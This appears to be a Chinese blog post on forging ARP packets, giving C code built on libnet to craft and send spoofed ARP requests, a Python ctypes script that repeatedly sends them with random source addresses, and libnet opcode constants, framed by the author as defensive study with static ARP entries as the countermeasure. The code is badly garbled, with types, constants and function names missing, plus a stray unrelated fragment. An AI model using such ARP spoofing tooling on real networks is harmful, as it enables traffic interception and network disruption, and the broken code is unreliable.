ARP数据包伪造


 

 

 

  攻的最高境界便是不战,是和平。

  静态arp表项轻松破解ARP伪造报文的攻击。我们研究伪造报文的目的在于深刻理解系统以更好地防御,而非攻击。

 

 

 

快应用程序的开发速度。

ForgeArp.c
 
 #include <stdio.h>
 #include <stdlib.h>
 #include <.h>
 #include <unistd.h>
 #include <libnet.h>
  MAC_ADDR_LEN 6
  IP_ADDR_LEN 4
  ForgeAndSendArp( * dev,unsigned  * src_mac,unsigned  *                           * src_ip_str, *dst_ip_str,uint16_t arpOp,unsigned            libnet_t *net_t =         unsigned  src_ip,dst_ip =                    unsigned  i=         src_ip =          (src_ip==-              printf(                        dst_ip =          (dst_ip==-              printf(                
         printf(         printf(         
         net_t  =         (net_t ==                  printf(                    
         p_tag =                         ARPHRD_ETHER,
                         ETHERTYPE_IP,
                         MAC_ADDR_LEN,
                         IP_ADDR_LEN,
                         arpOp,
                         (u_int8_t *)src_mac,
                         (u_int8_t *)&src_ip,
                         (u_int8_t *)dst_mac,
                         (u_int8_t *)&dst_ip,
                         NULL,
                         ,
                         net_t,
                         
          
         (- ==                  printf(                     
         p_tag = libnet_build_ethernet(
                         (u_int8_t *)dst_mac,
                         (u_int8_t *)src_mac,
                         ETHERTYPE_ARP,
                         NULL,
                         ,
                         net_t,
                         
  
         (- ==                  printf(                             
                  i=         (;i<sendTimes;i++           (- == (res =                  printf(                             
                                }

forgeArpTest.py
 
    
    ctypes  *
 arpLib=CDLL( 
      MacType= c_ubyte * 6
     macStr=macStr.translate(None,      MacType(int(macStr[0:2],16),int(macStr[2:4],16),int(macStr[4:6],16                    int(macStr[6:8],16)int(macStr[8:10],16),int(macStr[10:12],16      lis=[     lis.append(str(int(random.random()*1000/4      lis[1]==         
     arpLib.ForgeAndSendArp(,MacTran(),MacTran(                         ,.join(lis),,c_ushort(1),c_uint(2     time.sleep(1 
  


libnet--rc3\include\libnet\libnet-headers.h 
 
   uint16_t ar_op;          
  ARPOP_REQUEST    1  /* req to resolve address */
  ARPOP_REPLY      2  /* resp to previous request */
  ARPOP_REVREQUEST 3  /* req protocol address given hardware */
  ARPOP_REVREPLY   4  /* resp giving protocol address */
  ARPOP_INVREQUEST 8  /* req to identify peer */
  ARPOP_INVREPLY   9  /* resp identifying peer */

   

 

静态arp表项轻松破解ARP伪造报文的攻击。我们伪造报文的目的在于深刻理解系统以更好地防御,而非攻击。

相关内容